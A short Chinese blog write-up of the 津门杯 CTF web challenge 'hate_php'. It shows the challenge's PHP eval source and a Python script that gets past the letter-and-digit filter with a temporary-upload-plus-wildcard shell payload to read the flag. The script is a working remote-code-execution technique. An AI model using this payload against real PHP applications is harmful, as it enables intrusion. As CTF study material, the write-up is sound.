2021-05-12  /2021/05/12/津门杯hate-php/ 99+   1 分钟   0.1 k0次访问

津门杯hate_php

津门杯hate_php

1
2
3
4
5
6
7
8
9
10
11
<?php
error_reporting(0);
if(!isset($_GET['code'])){
    highlight_file(__FILE__);
}else{
    $code = $_GET['code'];
    if(preg_match("/[A-Za-z0-9_$@]+/",$code)){
        die('fighting!'); 
    }
    eval($code);
}

p神!无字母数字webshell之提高篇

可以在res中看到php版本为5.x,这里就需要用到p神的php5下的上传临时文件+通配符RCE

多过滤一个@,看着ascii往前换一个就行

脚本:

1
2
3
4
5
6
7
#coding:utf-8
import requests
url="http://122.112.214.101:20004/index.php?code=?><?=`. /???/????????[?-[]`;?>"
files={'file':'cat /flag'}
response=requests.post(url=url,files=files)
res = response.text
print(res)

有一定概率性……

津门杯hate_php

http://example.com/2021/05/12/津门杯hate-php/

作者

inanb

发布于

2021-05-12

更新于

2021-05-12

许可协议

# 相关文章
  1.CISCN2019-华东南赛区-Double-Secret
  2.津门杯GoOSS
  3.蓝帽杯2021复现
  4.hacker101-2
  5.HarekazeCTF-2019-encode_and_encode
  6.NCTF2019-SQLi
  7.SWPUCTF-2018-SimplePHP
  8.GYCTF2020-Ezsqli
# 推荐文章
  1.Black-Watch-入群题-Web
  2.DDCTF-2019-homebrew event loop
  3.GYCTF2020-EasyThinking
  4.GXYCTF2019-BabysqliV3.0
  5.GYCTF2020-Easyphp
  6.HFCTF2020-JustEscape

喜欢这篇文章?打赏一下作者吧

关注我

:D 一言句子获取中...

链接

最新文章

分类

归档

标签

buuctf29
Buuctf5
PHP2
RCE2
php变量覆盖2
伪协议2
Buuctf PHP代码审计 文件包含1
Buuctf SQL1
Html和css1

订阅更新

×